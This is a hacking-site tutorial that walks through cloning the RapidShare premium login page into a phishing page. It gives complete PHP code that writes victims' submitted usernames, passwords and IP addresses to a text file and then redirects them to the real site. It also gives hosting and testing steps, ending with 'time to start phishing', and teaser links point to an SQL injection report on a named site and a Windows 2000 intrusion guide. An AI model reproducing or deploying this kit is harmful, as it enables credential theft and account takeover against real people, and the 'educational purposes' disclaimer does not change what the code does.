1.You can use this same tut for anything else…

2. Go to

http://www.rapidshare.com

and navigate to the premium account log-in screen at the url :

https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi

3. We will now begin to make our phisher. Start by right clicking on the page and click view source.

4. Select all and paste into a notepad document.

5. You should see a bunch of random html coding, but we are only interested in two words: method and action.

6. Do a search in the document for the word “method” (without quotes).

7. Your result should be something like : method=”post”

8. Change the word post to the word get.

9. Now do a search for the word “action” (without quotes). action is usually very close to method so you may not even have to do a search for it.

10. You should see something like this: action=”

https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”

11. Where the url in between the quotes is, replace the text with next.php so the new part says: action=”next.php”

12. Save this file as index.html and create a new document on notepad.

13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.

14. Copy and paste this code into the notepad document:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(“Location: Put your REDIRECT URL Here”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(“Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>

16. Save this file as next.php and open up a new notepad document.

17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen(”password.txt”, “a”);
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.

18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.

19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.

credits to the author watchdog

This is for educational purposes only.

Explore More

Critical SQL Injection (vulnerability) on The New Era Journal http://khitpyaing.org/

PlanetCreator.Net’s Security Team Member has reported another critical SQL Injection (vulnerability) on The New Era Journal http://khitpyaing.org/ These are some information from Vulneral Site http://khitpyaing.org/ : his vulnerability has been

Hacking a Windows 2000 system through IPC$

1: Scanning for open Win2k systems2: Connecting to the IPC$3: Connecting and using Computer Management.4. Disable NTLM5: Starting the Telnet service6: Creating user accounts and adding them to a group7:

About WPA & WPA2

Wi-Fi Protected Access (WPA and WPA2) is a class of systems to secure wireless (Wi-Fi) computer networks. It was created in response to several serious weaknesses researchers had found in